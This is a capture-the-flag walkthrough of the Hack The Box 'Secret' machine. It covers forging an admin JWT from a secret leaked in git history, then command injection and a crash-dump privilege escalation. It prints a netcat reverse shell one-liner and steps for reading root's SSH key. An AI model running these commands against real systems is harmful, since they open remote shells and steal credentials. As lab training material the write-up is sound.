[ Hack The Box ] Secret

Let’s start with nmap

This is the web page

Click on one of the box below, it will take you to the another page, which will guide you how to use the api.

• How to register:

• After register, you can log in and have a auth-token:

• If you are admin, you can use this auth-token to access private route.

Let’s put into action! I used curl to do all that stuff!

Register

curl -X POST -H ‘Content-Type: application/json’ http://10.10.11.120/api/user/register -d ‘{ “name” : “your-name”, “email” : “your@email.com”, “password” : “your-password” }’

Log in

curl -X POST -H ‘Content-Type: application/json’ http://10.10.11.120/api/user/login -d ‘{ “email” : “your@email.com”, “password” : “your-password” }’

Now we have our auth-token. Let’s put it in JWT Debugger. It seems like we need something to decrypt the token:

Back to the web page at the beginning, scroll down you can see a button to download the source code.

After read all the files, I found in the file named .env has a Secret token:

Then I noticed we can execute command in this piece of code if we are theadmin, like we’ve read before, theadmin can access the private route:

…/routes/private.js

There is also a .git folder too. You can view the history of the change of source code by type the command git log.

Run git diff HEAD~2, we can see the token in the change

So, we need to log in our own account that we created before to get the token. Then put the token to JWT Debugger together with the TOKEN_SECRET we just found. After finish that, we can finally modify the name in JWT to “theadmin”.

Let’s try this out!

Yay

Now we can execute commands! Let’s create a reverse shell.

You can take one of the payloads from here, change the ip and port, then use URL encoder to encode it. The one I used is: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f

Now we can get the user flag. We will need to upgrade the shell, you can follow this tutorial for that.

In /opt, we can file a code that set SUID.

Run that code, give/root/root.txt as an input. Press Ctrl+Z to pause the process. Then kill the process with the PID which we can found by executing the command ps. The process will crashed and we can get more information inside /var/crash.

“The apport-unpack command will output human readable files into a directory provided a .crash file and the name of a directory.”

After execute the command above, scroll down a little bit you will find content of the root flag. You can also download root ssh key file by replace /root/root.txt with /root/.ssh/id_rsa in the step before to log in the machine as root.